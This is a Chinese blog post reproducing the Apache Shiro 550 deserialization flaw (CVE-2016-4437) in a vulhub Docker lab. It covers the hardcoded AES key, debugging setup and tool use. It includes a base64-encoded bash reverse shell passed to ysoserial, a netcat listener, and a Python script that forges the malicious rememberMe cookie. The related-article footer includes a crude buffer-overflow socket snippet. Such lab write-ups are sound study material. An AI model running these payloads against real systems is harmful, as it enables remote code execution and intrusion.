shiro550-cve-2016-4437复现

最新推荐文章于 2025-05-10 17:02:36 发布
最新推荐文章于 2025-05-10 17:02:36 发布
阅读量1k 收藏 20
点赞数 12
CC 4.0 BY-SA版权
分类专栏: 划水吐槽 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/google20/article/details/146098936

shiro550-cve-2016-4437

复现环境:docker desktop

idea远程调试jdk版本必须与容器里的jdk1.8.0_102 匹配上,下载资源翻我CC1链那篇文章

注意burpsuite的proxy listeners端口改一下别跟docker容器的重了。

ysoserial工具:https://github.com/frohoff/ysoserial/releases/tag/v0.0.6

一键工具:https://github.com/SummerSec/ShiroAttack2/releases

jdk11后不支持JavaFX库,使用jdk1.8

文章目录

1. 简介

影响版本:Shiro <= 1.2.4

原理:Apache Shiro 提供了一种“rememberMe”功能,用于在用户关闭浏览器后仍然保持会话,当启用该功能时,Shiro 会将用户的会话信息序列化并存储在一个 cookie 中,以便在用户重新访问时反序列化并恢复会话;在这边攻击者可以通过修改“rememberMe” cookie,注入特制的恶意Java 序列化对象;当 Shiro 反序列化这个恶意对象时,攻击者可以在目标系统上执行任意代码。

加密的密钥Key被硬编码在代码里kPH+bIxk5D2deZiIxcaaaA==

Payload的构造流程:

恶意命令–>序列化–>AES加密–>base64编码–>发送Cookie

判断方法:随便输账号密码密码,勾选remember me,burpsuite抓包发现请求包中有RememberMe字段,响应包有Set-cookie:rememberMe=deleteMe字段

在这里插入图片描述

Shiro服务器识别身份加解密处理的流程

(1)加密

1.用户使用账号密码进行登录,并勾选"Remember Me"。

2、Shiro验证用户登录信息,通过后,查看用户是否勾选了”Remember Me“。

3、若勾选,则将用户身份序列化,并将序列化后的内容进行AES加密,再使用base64编码。

4、最后将处理好的内容放于cookie中的rememberMe字段。

(2)解密

1、当服务端收到来自未经身份验证的用户的请求时,会在客户端发送请求中的cookie中获取rememberMe字段内容。

2、将获取到的rememberMe字段进行base64解码,再使用AES解密。

3、最后将解密的内容进行反序列化,获取到用户身份。

2. 远程调试方法

C:\Users\21609\vulhub\shiro\CVE-2016-4437目录下修改docker-compose.yml,让它能远程调试

services:
 web:
   image: vulhub/shiro:1.2.4
   ports:
    - "8080:8080"
    - "5050:5050"
   command: java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050 -jar /shirodemo-1.0-SNAPSHOT.jar

启容器

C:\Users\21609\vulhub\shiro\CVE-2016-4437>docker-compose up -d

docker desktop进容器里执行命令

su 
find / -name "*.jar"
java -version #openjdk version "1.8.0_102"

cmd里把容器里的文件拷贝出来

docker cp 67192e54766a:/shirodemo-1.0-SNAPSHOT.jar shirodemo-1.0-SNAPSHOT.jar

改后缀为zip解压,idea打开当前目录,右键lib目录,add as library

在file->project structure->module->dependencies里选中lib添加目录BOOT-INF,然后记得打勾,sdk选1.8.0_102

在这里插入图片描述

新建debug configuration

在这里插入图片描述

navigate->Search Everywhere,搜索onSuccessfulLogin函数

isRememberMe为true时,进rememberIdentity函数

在这里插入图片描述

在下图处打断点

在这里插入图片描述

然后idea运行debug configuration

使用admin:vulhub进行登录

在这里插入图片描述

可以看到程序成功断下

在这里插入图片描述

AES CBC模式加密

在这里插入图片描述

注意到密钥是固定值

在这里插入图片描述

在这里插入图片描述

3. 复现流程

1. 工具复现

C:\Program Files\Java\jdk1.8.0_102\bin>.\java.exe -jar C:\Users\21609\Downloads\shiro_attack-4.7.0-SNAPSHOT-all\shiro_attack-4.7.0-SNAPSHOT-all.jar

填入密钥kPH+bIxk5D2deZiIxcaaaA==后检测密钥,再点击检测当前利用链。

在这里插入图片描述

点击命令执行输入命令即可执行。

在这里插入图片描述

2. 半手工复现

起个控制台
nc64 -lvvp 8054

使用ysoserial生成CC5的Gadget:

#payload不能包含>,<
#进https://forum.ywhack.com/shell.php选取base64编码的payload
#ip:192.168.75.180 port:8054
#使用 java 命令运行 ysoserial-all.jar 中的类,监听指定端口等待连接
C:\Users\21609\Desktop\code>java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE4MC84MDU0IDA+JjE=}|{base64,-d}|{bash,-i}"

在这里插入图片描述

#pip install pycryptodome
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'C:\\Users\\21609\\Desktop\\code\\ysoserial-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    #stdout=subprocess.PIPE:捕获命令的标准输出(即生成的 payload)
    BS = AES.block_size #获取AES加密的块大小(通常为 16 字节)
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    #用于对数据进行填充,使其长度是块大小的整数倍(PKCS7 填充)
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") #base64解码出AES密钥
    iv = uuid.uuid4().bytes #UUID转字节流作为AES加密的初始化向量
    encryptor = AES.new(key, AES.MODE_CBC, iv)#创建一个 AES 加密器
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(input("请输入`攻击机ip:JRMP端口`:"))#攻击机ip:JRMP端口
    #192.168.75.180:7777
    print("rememberMe={0}".format(payload.decode()))

在这里插入图片描述

在这里插入图片描述

burpsuite抓包修改一下
在这里插入图片描述

成功

在这里插入图片描述

参考

IDEA远程调试Docker中程序的方法 AresX

Web渗透:Shiro550漏洞(CVE-2016-4437)WolvenSec

shiro550反序列化漏洞原理与漏洞复现 程序员负总裁

复现xray——CVE-2016-4437(shiro反序列化漏洞)
记录并分享学习安全的知识点..
01-17 1091
一、漏洞介绍 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Pa
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3021
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
最新发布
spinage的博客
05-10 483
攻击者可利用该漏洞通过伪造的 RememberMe Cookie 触发恶意代码执行
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 2118
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞。
Apache shiro550 CVE-2016-4437复现
weixin_65582330的博客
03-20 1042
填好目标地址,然后爆破密钥,用已知的密钥库爆破,然后检测当前的利用链,再爆破利用链,利用链可以进行选择,一个不行就换下一个。apache shiro提供了登录信息保存的功能,服务器在验证用户身份的过程中有反序列化操作,这是导致漏洞的主要原因。随便输入账号密码进行抓包,可以看到有rememberme=remember-me,为shiro的特征。这时就会让服务器访问我们建立好的JRMP的服务,然后让服务器反弹连接到攻击机的7777端口。然后再手动复现一遍:下面是大概的利用方式。# 生成随机16位长度的IV。
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 1062
shiro550漏洞,漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
Shiro-550漏洞分析与复现(CVE-2016-4437)
人们并不感谢罗辑
07-26 2690
Shiro中实现身份验证主要是靠Remember Me(记住我)功能,它允许用户在关闭浏览器后再次访问时无需重新登陆。用户登陆成功后生成一个加密的、包含用户身份信息的序列化对象,加密过程是 身份信息 -- 序列化 -- AES加密 -- base64编码 ,然后储存在remember Me的cookie中。当用户再次登录时,浏览器会携带这个remember Me发送给服务器。服务器解析从而获得用户身份信息,实现免登录访问,过程就是base64编码 -- AES加密 -- 序列化 -- 身份信息。
【渗透测试】-CVE-2016-4437-Shiro550漏洞复现
weixin_65311462的博客
09-13 1256
Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。使用安全的加密算法和密钥管理策略来保护敏感数据。
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 377
shiro反序列化漏洞(shiro-550/CVE-2016-4437
Shiro550 反序列化漏洞(CVE-2016-4437
qq_68163788的博客
06-20 1283
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 764
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 5508
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞是 Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Apache shiro反序列化(CVE-2016-4437复现
weixin_49848824的博客
07-09 946
一、原理分析Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问Shiro会对cookie中的Remember me字段进行相关处理:序列化-->AES加密-->base64编码由于Shiro本身含有一个预设的AES密钥Base64.decode("KPHblxk5D2deZilxcaaaA=="),每个人都能够通过源代码拿到该密钥,因此攻击者可以构造一个恶意的对象,对其进行序列化并用该密钥进行加密,b
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1745
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
Shiro漏洞复现Shiro-550
weixin_51151498的博客
12-19 927
Shiro漏洞复现Shiro-550
Apache Shiro反序列化(CVE-2016-4437)漏洞复现
m0_55854679的博客
07-31 888
Apache shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。使用Java序列化—>使用密钥进行AES加密—>Base64加密—>得到加密后的RememberMe内容同时在识别用户身份的时候,需要对RememberMe加密内容—>Base64解密—>使用密钥进行AES解密—>Java反序列化问题出在AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,的将。..
shiro反序列化漏洞(CVE-2016-4437)漏洞复现
HEAVEN569的博客
06-21 6651
本文对shiro反序列化漏洞(CVE-2016-4437),进行了分析复现,介绍了利用工具和常规修复方法
shiro-cve_2016_4437漏洞复现
fairy1016的博客
07-20 622
漏洞概述: 该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操
Shiro-550 漏洞复现
qq_46440393的博客
03-15 2327
开始时间:2022/3/14 14:15 1、什么是shiro ? Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、shiro 可以用来干什么? 三个核心组件:Subject, SecurityManager 和 Realms. Subject:即“当前操作用户”。但是,在Shiro中,Subject这一概念并不仅仅指人
CVE-1999-0519复现
03-19
<think>好的,我需要帮助用户复现CVE-1999-0519漏洞。首先,我需要确认这个漏洞的具体信息,因为CVE-1999-0519的记录可能比较老旧,资料可能有限。 首先,查阅现有的引用资料。用户提供的三个引用分别是关于Shiro、Tomcat和Apache HTTP Server的漏洞,但CVE-1999-0519不在其中。这说明用户可能需要更广泛的信息。 接下来,我应该搜索CVE-1999-0519的详细信息。根据记忆,这个漏洞通常与Finger服务有关,属于缓冲区溢出或信息泄露类型。Finger服务在早期UNIX系统中常见,用于查询用户信息,但由于其设计不安全,容易导致信息泄露或攻击。 确认漏洞类型后,复现环境需要包含运行Finger服务的旧系统,如Solaris 2.6或更早版本,或者某些Linux发行版的老版本。用户可能需要使用虚拟机安装这些旧系统,并启用Finger服务。 复现步骤可能包括:安装配置Finger服务,利用漏洞获取敏感信息或执行缓冲区溢出攻击。例如,使用finger命令查询用户信息,或者发送超长请求触发溢出。 同时,需要提醒用户注意法律风险,仅在授权环境下测试,并强调该漏洞年代久远,现代系统可能已修复,因此复现需特定环境。 最后,生成相关问题,帮助用户深入理解此类漏洞,例如其他信息泄露漏洞、Finger服务的安全问题,以及如何防护老旧服务漏洞。</think>根据现有信息分析,CVE-1999-0519是一个与Finger服务相关的信息泄露漏洞。由于该漏洞年代久远(1999年),以下是复现建议: ### 漏洞背景 Finger协议(RFC 1288)用于查询系统用户信息,CVE-1999-0519的漏洞表现包括: 1. 远程攻击者通过finger服务获取敏感用户信息 2. 某些实现存在缓冲区溢出风险[^1] ### 复现步骤 #### 环境搭建 1. 使用旧版操作系统(如Solaris 2.6或Linux发行版Red Hat 5.x) 2. 启用finger服务: ```bash # 安装finger守护进程 sudo apt-get install fingerd # 启动服务(旧系统可能默认启用) service finger start ``` #### 攻击验证 1. 基础信息泄露测试: ```bash finger @victim_host # 列出所有登录用户 finger username@victim_host # 获取特定用户详细信息 ``` 2. 缓冲区溢出测试(需具体实现版本): ```python # 构造超长请求(示例) import socket payload = "A" * 2000 # 长度需根据目标系统调整 s = socket.socket() s.connect(("victim_ip", 79)) s.send(payload.encode()) ``` ### 防护建议 $$ \text{风险系数} = \frac{\text{攻击复杂度}}{\text{修复成本}} \times \text{影响范围} $$ 现代系统已默认关闭finger服务,建议: 1. 禁用finger服务:`chkconfig finger off` 2. 使用防火墙阻止79端口 3. 升级到无漏洞版本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cllsse

富✌您吉祥

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值